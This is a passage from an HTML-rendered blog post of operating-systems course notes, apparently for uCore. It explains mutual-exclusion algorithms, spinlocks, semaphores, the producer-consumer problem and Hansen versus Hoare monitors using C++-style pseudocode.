class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> turn; <span class="comment">// whose turn it is to enter the critical section</span></span><br><span class="line"><span class="type">bool</span> flag[]; <span class="comment">// whether each thread is ready to enter the critical section</span></span><br></pre></td></tr></table></figure></li><li><p>Entry section code</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="comment">// mark that the current thread wants to enter the critical section</span></span><br><span class="line">flag[i] = <span class="literal">true</span>;</span><br><span class="line"><span class="comment">// let the other process go first</span></span><br><span class="line">turn = j;</span><br><span class="line"><span class="comment">// if the other process wants to enter and it is its turn, the current process waits</span></span><br><span class="line"><span class="keyword">while</span>(flag[j] &amp;&amp; turn == j)</span><br><span class="line">    ;</span><br></pre></td></tr></table></figure></li><li><p>Exit-section code</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// mark that the current thread no longer wants to enter the critical section</span></span><br><span class="line">flag[i] = <span class="literal">false</span>;</span><br></pre></td></tr></table></figure></li><li><p>Summary</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// code for thread Ti</span></span><br><span class="line"><span class="keyword">do</span>&#123;</span><br><span class="line">    <span class="comment">// mark that the current thread wants to enter the critical section</span></span><br><span class="line">    flag[i] = <span class="literal">true</span>;</span><br><span class="line">    <span class="comment">// let the other process go first</span></span><br><span class="line">    turn = j;</span><br><span class="line">    <span class="comment">// 
if the other process wants to enter and it is its turn, the current process waits</span></span><br><span class="line">    <span class="keyword">while</span>(flag[j] &amp;&amp; turn == j)</span><br><span class="line">        ;<span class="comment">// busy-wait</span></span><br><span class="line"></span><br><span class="line">    CRITICAL SECTION</span><br><span class="line"></span><br><span class="line">    flag[i] = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    REMAINDER SECTION</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">while</span>(<span class="literal">true</span>);</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Dekker's algorithm. Its logic is similar to Peterson's, and it is another mutual exclusion algorithm for two threads. The difference is that <strong>this scheme can be extended to more than two threads</strong> (the version below still handles only two).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// code for thread Ti</span></span><br><span class="line">flag[<span class="number">0</span>] = flag[<span 
class="number">1</span>] = <span class="literal">false</span>;</span><br><span class="line">turn = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">do</span>&#123;</span><br><span class="line">    <span class="comment">// mark that the current process wants to enter the critical section</span></span><br><span class="line">    flag[i] = <span class="literal">true</span>;</span><br><span class="line">    <span class="comment">// while the other process also wants to enter, let it go first</span></span><br><span class="line">    <span class="keyword">while</span>(flag[j] == <span class="literal">true</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// if it is not the current process's turn</span></span><br><span class="line">        <span class="keyword">if</span>(turn != i)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// withdraw the request to enter the critical section</span></span><br><span class="line">            flag[i] = <span class="literal">false</span>;</span><br><span class="line">            <span class="comment">// and wait until it is this process's turn</span></span><br><span class="line">            <span class="keyword">while</span>(turn != i)</span><br><span class="line">                ; <span class="comment">// busy-wait</span></span><br><span class="line">            <span class="comment">// once it is this process's turn, raise the flag again</span></span><br><span class="line">            flag[i] = <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    CRITICAL SECTION</span><br><span class="line"></span><br><span class="line">    <span class="comment">// the critical section is done; pass the turn to the other process</span></span><br><span class="line">    turn = j;</span><br><span class="line">    flag[i] = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    REMAINDER SECTION</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">while</span>(<span 
class="literal">true</span>);</span><br></pre></td></tr></table></figure></li><li><p>Software method for N threads (Eisenberg and McGuire)</p><p><img src="/2020/09/uCore-7/nthreads.png" alt="img"></p></li><li><p>Drawbacks</p><ul><li>Complex: requires data items shared between the processes</li><li>Requires busy-waiting: wastes CPU time</li></ul></li></ul><h5 id="3-更高级的抽象方法">3) Higher-level abstractions</h5><ul><li><p>The hardware provides some synchronization primitives, such as disabling interrupts and atomic instructions</p></li><li><p>The operating system provides higher-level programming abstractions to simplify process synchronization, such as locks and semaphores, built on top of the hardware primitives</p></li><li><p><strong>Lock</strong></p><ul><li><p>A lock is an abstract data structure</p><ul><li>It uses one binary variable to represent locked/unlocked</li><li><strong>Lock::Acquire()</strong> : waits until the lock is released, then takes it</li><li><strong>Lock::Release()</strong> : releases the lock and wakes up any waiting process</li></ul></li><li><p>Using a lock to control access to a critical section</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">lock_next_pid-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">new_pid = next_pid++;</span><br><span class="line">lock_next_pid-&gt;<span class="built_in">Release</span>();</span><br></pre></td></tr></table></figure></li></ul></li><li><p><strong>Atomic instructions</strong></p><ul><li><p>Modern CPU architectures all provide some special atomic instructions</p></li><li><p>The Test-and-Set instruction</p><blockquote><p>Reads a value from memory, tests whether it is 1, and sets the memory location to 1</p></blockquote><p>Equivalent to:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">TestAndSet</span><span class="params">(<span class="type">bool</span> *target)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">bool</span> ret = *target;</span><br><span class="line">    *target = <span class="number">1</span>;</span><br><span 
class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The exchange instruction</p><blockquote><p>Swaps two values in memory</p></blockquote><p>Equivalent to:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">exchange</span><span class="params">(<span class="type">bool</span> *a, <span class="type">bool</span>* b)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">bool</span> tmp = *a;</span><br><span class="line">    *a = *b;</span><br><span class="line">    *b = tmp;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Implementing a spinlock with the TS instruction</p><ul><li><p>Busy-waiting (spinning) lock</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Lock</span>&#123;</span><br><span class="line">    <span class="type">int</span> value = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span 
class="title">Acquire</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// if the lock is free, read it and set value to 1</span></span><br><span class="line">        <span class="comment">// if the lock is held, keep looping and checking</span></span><br><span class="line">        <span class="keyword">while</span>(test-<span class="keyword">and</span>-<span class="built_in">set</span>(value))</span><br><span class="line">            ; <span class="comment">// spin: the thread burns CPU time while it waits</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Release</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        value = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Lock without busy-waiting (non-spinning lock)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Lock</span>&#123;</span><br><span 
class="line">    <span class="type">int</span> value = <span class="number">0</span>;</span><br><span class="line">    WaitQueue q;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Acquire</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// if the lock is free, read it and set value to 1</span></span><br><span class="line">        <span class="comment">// if the lock is held, keep looping and checking</span></span><br><span class="line">        <span class="keyword">while</span>(test-<span class="keyword">and</span>-<span class="built_in">set</span>(value))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// the current thread cannot get the lock, so it joins the wait queue</span></span><br><span class="line">            q.<span class="built_in">push_back</span>(currentThread-&gt;PCB);</span><br><span class="line">            <span class="comment">// switch to another thread</span></span><br><span class="line">            <span class="built_in">schedule</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Release</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        value = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// wake up a thread from the wait queue</span></span><br><span class="line">        PCB&amp; t = q.<span class="built_in">pop_front</span>();</span><br><span class="line">        <span class="built_in">wakeup</span>(t);</span><br><span class="line">    &#125;</span><br><span 
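class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Properties of locks built on atomic instructions</p><ul><li><p>Advantages</p><ul><li>Works for synchronizing any number of processes on a uniprocessor or a shared-memory multiprocessor</li><li>Simple and easy to prove correct</li><li>Supports multiple critical sections</li></ul></li><li><p>Drawbacks</p><ul><li><p>Busy-waiting consumes processor time</p></li><li><p>May cause starvation: when a process leaves the critical section while several processes are waiting, nothing guarantees which of them gets in next</p></li><li><p><strong>Deadlock</strong>: a low-priority process holds the critical section, while a high-priority process that requests it gets the processor and spins waiting, so the low-priority process never runs to release it.</p></li></ul></li></ul></li></ul><h3 id="4-信号量">4. Semaphores</h3><h4 id="a-相关概念">a. Concepts</h4><ul><li><p>A semaphore is a mechanism provided by the operating system for coordinating access to shared resources</p><ul><li>Software synchronization is a negotiation mechanism between threads of equal standing</li><li>The OS is the manager and ranks above the processes</li><li>A semaphore represents the number of available system resources</li></ul></li><li><p>A semaphore is an abstract data type</p><ul><li>It consists of one integer variable (sem) and two atomic operations</li><li><strong>P()</strong> : <code>sem--</code>; if sem&lt;0, wait, otherwise continue</li><li><strong>V()</strong> : <code>sem++</code>; if sem &lt;= 0, wake up one waiting process</li></ul></li><li><p>A semaphore is a protected integer variable</p><ul><li>After initialization it can only be modified through <strong>P()</strong> and <strong>V()</strong></li><li>The operating system guarantees that P and V are <strong>atomic operations</strong></li></ul></li><li><p>P() may block, but V() never blocks</p></li><li><p>Semaphores are usually assumed to be “fair”</p><ul><li><p>That is, a thread is never blocked in P() indefinitely</p></li><li><p>Waiting threads are assumed to be queued first-in, first-out</p><blockquote><p>A spinlock cannot provide first-in, first-out ordering</p></blockquote></li></ul></li><li><p>One way to implement a semaphore</p><blockquote><p>Unlike a lock written by the user, <strong>the operating system guarantees that P and V are atomic</strong>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td 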
class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Semaphore</span>&#123;</span><br><span class="line">    <span class="type">int</span> sem;</span><br><span class="line">    WaitQueue q;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">P</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// thanks to the OS guarantee, no race can occur between updating sem and testing it</span></span><br><span class="line">        sem--;</span><br><span class="line">        <span class="keyword">if</span>(sem &lt; <span class="number">0</span>)&#123;</span><br><span class="line">            Add <span class="keyword">this</span> thread t to q;</span><br><span class="line">            <span class="built_in">block</span>(t);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">V</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        sem++;</span><br><span class="line">        <span class="keyword">if</span>(sem &lt;= <span class="number">0</span>)&#123;</span><br><span class="line">            Remove a thread t from q;</span><br><span class="line">            <span class="built_in">wakeup</span>(t);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-信号量的分类">b. 
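Types of semaphores</h4><ul><li><p>Semaphores come in two kinds</p><ul><li><strong>Binary semaphore</strong>: the resource count is 0 or 1</li><li><strong>Counting (resource) semaphore</strong>: the resource count is any non-negative value</li></ul><blockquote><p>The two are equivalent: either one can be implemented in terms of the other</p></blockquote></li><li><p>Uses of semaphores</p><ul><li>Mutual exclusion: controlling exclusive access to a critical section</li><li>Conditional synchronization: waiting for events between threads</li></ul></li><li><p>Implementing mutually exclusive access to a critical section with a semaphore</p><ul><li>Set up one semaphore per class of resource, with an initial value of 1</li><li>P() and V() must be used in pairs<ul><li>P() guarantees exclusive access to the critical resource</li><li>V() releases the critical resource after use</li><li>P and V operations <strong>must not be reordered, duplicated, or omitted</strong></li></ul></li></ul></li><li><p>Drawbacks</p><ul><li>Code is hard to read and to write. Programmers must be proficient with the semaphore mechanism</li><li>Error-prone: for example, using a semaphore that another thread already holds, or forgetting to release a semaphore</li><li>Cannot deal with deadlock</li></ul></li></ul><h5 id="生产者-消费者问题">The producer-consumer problem</h5><ul><li><p>Problem statement</p><ul><li>One or more producers generate data and place it in a buffer</li><li>A single consumer takes data out of the buffer and processes it</li><li>At any moment only one producer or consumer may access the buffer</li></ul></li><li><p>Analysis</p><ul><li>Only one thread may operate on the buffer at any moment (mutual exclusion)</li><li>When the buffer is empty, the consumer must wait for a producer (conditional synchronization)</li><li>When the buffer is full, a producer must wait for the consumer (conditional synchronization)</li></ul></li><li><p>Describe each constraint with a semaphore</p><ul><li>Binary semaphore <code>mutex</code></li><li>Counting semaphore <code>fullBuffers</code></li><li>Counting semaphore <code>emptyBuffers</code></li></ul></li><li><p>Solution in code</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title 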
class_">BoundedBuffer</span>&#123;</span><br><span class="line">    mutex = <span class="keyword">new</span> <span class="built_in">Semaphore</span>(<span class="number">1</span>);</span><br><span class="line">    fullBuffers = <span class="keyword">new</span> <span class="built_in">Semaphore</span>(<span class="number">0</span>);</span><br><span class="line">    emptyBuffers = <span class="keyword">new</span> <span class="built_in">Semaphore</span>(n);</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Deposit</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// claim an empty slot (blocks if the buffer is full)</span></span><br><span class="line">        emptyBuffers-&gt;<span class="built_in">P</span>();</span><br><span class="line">        <span class="comment">// take exclusive access to the buffer (blocks if it is in use)</span></span><br><span class="line">        mutex-&gt;<span class="built_in">P</span>();</span><br><span class="line">        Add c to the buffer;</span><br><span class="line">        <span class="comment">// release exclusive access to the buffer</span></span><br><span class="line">        mutex-&gt;<span class="built_in">V</span>();</span><br><span class="line">        <span class="comment">// data was written to the buffer, so increase the count of full slots</span></span><br><span class="line">        fullBuffers-&gt;<span class="built_in">V</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Remove</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        fullBuffers-&gt;<span class="built_in">P</span>();</span><br><span class="line">        mutex-&gt;<span class="built_in">P</span>();</span><br><span class="line">        remove c from the 
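buffer;</span><br><span class="line">        mutex-&gt;<span class="built_in">V</span>();</span><br><span class="line">        emptyBuffers-&gt;<span class="built_in">V</span>();</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note that <strong>the P and V operations must be issued in the matching order</strong>, otherwise <strong>deadlock</strong> can occur! For example, if Deposit called mutex-&gt;P() before emptyBuffers-&gt;P(), a producer facing a full buffer would block while holding mutex, and the consumer could never get in to free a slot.</p></li></ul><h3 id="5-管程">5. Monitors</h3><h4 id="a-相关概念-2">a. Concepts</h4><ul><li>A monitor is a program structure that gives multiple threads mutually exclusive access to shared resources<ul><li>It takes an object-oriented approach and simplifies synchronization between threads</li><li>At any moment at most one thread executes monitor code</li><li><strong>A thread inside the monitor can temporarily give up its exclusive access and resume when the event it waits for occurs</strong></li></ul></li><li>Using a monitor<ul><li>Gather the related shared data in an object/module</li><li>Define the methods that access the shared data</li></ul></li><li>Components of a monitor<ul><li>One lock, which controls exclusive access to the monitor code</li><li>0 to n condition variables, which manage concurrent access to the shared data</li></ul></li><li>Why monitors were introduced:<ul><li>To gather the critical sections scattered across processes and manage them in one place</li><li>To prevent processes from violating synchronization rules, intentionally or not</li><li>To make programs easier to write in a high-level language and easier to verify.</li></ul></li></ul><h4 id="b-条件变量">b. Condition variables</h4><ul><li><p>A condition variable is the waiting mechanism inside a monitor</p><ul><li>A thread that has entered the monitor goes into the waiting state because a resource is unavailable</li><li>Each condition variable represents one reason for waiting and has its own wait queue</li></ul></li><li><p>The <strong>Wait()</strong> operation</p><ul><li>Blocks the caller on the wait queue</li><li>Wakes up a waiter or releases the monitor's exclusive access</li></ul></li><li><p>The <strong>Signal()</strong> operation</p><ul><li>Wakes up one thread on the wait queue</li><li>If the wait queue is empty, it is a no-op</li></ul></li><li><p>Solving the producer-consumer problem with <strong>condition variables</strong></p><blockquote><p>Read this code together with the monitor-based producer-consumer solution that follows</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 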
class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Condition</span>&#123;</span><br><span class="line">    <span class="type">int</span> numWaiting = <span class="number">0</span>;</span><br><span class="line">    WaitQueue q;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Wait</span><span class="params">(lock)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        numWaiting++;</span><br><span class="line">        add <span class="keyword">this</span> thread t to q;</span><br><span class="line">        <span class="built_in">release</span>(lock);  <span class="comment">// release the lock held so far</span></span><br><span class="line">        <span class="built_in">schedule</span>(); <span class="comment">// need mutex</span></span><br><span class="line">        <span class="built_in">acquire</span>(lock); <span class="comment">// re-acquire the lock released above</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Signal</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(numWaiting &gt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            Release a thread t from q;</span><br><span class="line">            <span class="built_in">wakeup</span>(t);</span><br><span class="line">            numWaiting--;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Solving the producer-consumer problem with a <strong>monitor</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">BoundedBuffer</span>&#123;</span><br><span class="line">    ...</span><br><span class="line">    Lock lock;</span><br><span class="line">    <span class="type">int</span> count = <span class="number">0</span>;</span><br><span class="line">    Condition notFull, notEmpty;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Deposit</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// if the buffer already holds its maximum number of items</span></span><br><span class="line">        <span class="keyword">while</span>(count == n)</span><br><span class="line">            <span class="comment">// the current thread waits</span></span><br><span class="line">            notFull.<span 
class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">        Add c to the buffer;</span><br><span class="line">        count++;</span><br><span class="line">        notEmpty.<span class="built_in">Signal</span>();</span><br><span class="line">        lock-&gt;<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Remove</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">        <span class="comment">// if the buffer is empty, wait</span></span><br><span class="line">        <span class="keyword">while</span>(count == <span class="number">0</span>)</span><br><span class="line">            notEmpty.<span class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">        Remove c from buffer;</span><br><span class="line">        count--;</span><br><span class="line">        notFull.<span class="built_in">Signal</span>();</span><br><span class="line">        lock-&gt;<span class="built_in">Release</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>How signaling a condition variable is handled</p><blockquote><p>After thread T2 calls Signal, should T2 keep control until it finishes, or should control switch back to thread T1 immediately? These two choices correspond to the Hansen monitor and the Hoare monitor respectively.</p></blockquote><ul><li><p>Hansen monitor</p><blockquote><p>In a Hansen monitor, after a thread calls Signal, control is not handed to the other thread immediately; the current thread keeps running first.</p></blockquote><ul><li><p>The sequence is as follows</p><table><thead><tr><th style="text-align:center">Thread T1</th><th style="text-align:center">Thread T2</th></tr></thead><tbody><tr><td style="text-align:center">l.acquire()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">x.wait()</td><td style="text-align:center"></td></tr><tr><td 
style="text-align:center"></td><td style="text-align:center">l.acquire()</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">x.signal()</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">l.release()</td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">l.release()</td><td style="text-align:center"></td></tr></tbody></table></li><li><p>Characteristics: fewer thread switches and higher efficiency; mainly used in real operating systems and in Java.</p><ul><li>Signaling a condition variable is <strong>only a hint</strong></li><li>The condition must be rechecked</li></ul></li><li><p>Code</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">Deposit</span><span class="params">(c)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    lock-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">    <span class="comment">// note that the check uses while</span></span><br><span class="line">    <span class="keyword">while</span>(count == n)</span><br><span class="line">        notFull.<span class="built_in">Wait</span>(&amp;lock);</span><br><span class="line">    Add c to the buffer;</span><br><span class="line">    count++;</span><br><span class="line">    notEmpty.<span class="built_in">Signal</span>();</span><br><span class="line">    lock-&gt;<span 
class="built_in">Release</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Hoare monitor</p><blockquote><p>In a Hoare monitor, after a thread calls Signal, control is <strong>handed over immediately</strong> to the other thread.</p></blockquote><ul><li><p>The sequence is as follows</p><table><thead><tr><th style="text-align:center">Thread T1</th><th style="text-align:center">Thread T2</th></tr></thead><tbody><tr><td style="text-align:center">l.acquire()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">x.wait()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center"></td><td style="text-align:center">l.acquire()</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">x.signal()</td></tr><tr><td style="text-align:center">…</td><td style="text-align:center"></td></tr><tr><td style="text-align:center">l.release()</td><td style="text-align:center"></td></tr><tr><td style="text-align:center"></td><td style="text-align:center">…</td></tr><tr><td style="text-align:center"></td><td style="text-align:center">l.release()</td></tr></tbody></table></li><li><p>Characteristics: in the usual analysis it is more reasonable for T1 to run first, but this takes several thread switches and is <strong>inefficient</strong>. Mainly found in textbooks</p><ul><li>Signaling a condition variable also means <strong>giving up access to the monitor</strong></li><li>After the signal, the woken thread can rely on the condition it waited for</li></ul></li><li><p>Code</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">Deposit</span><span 
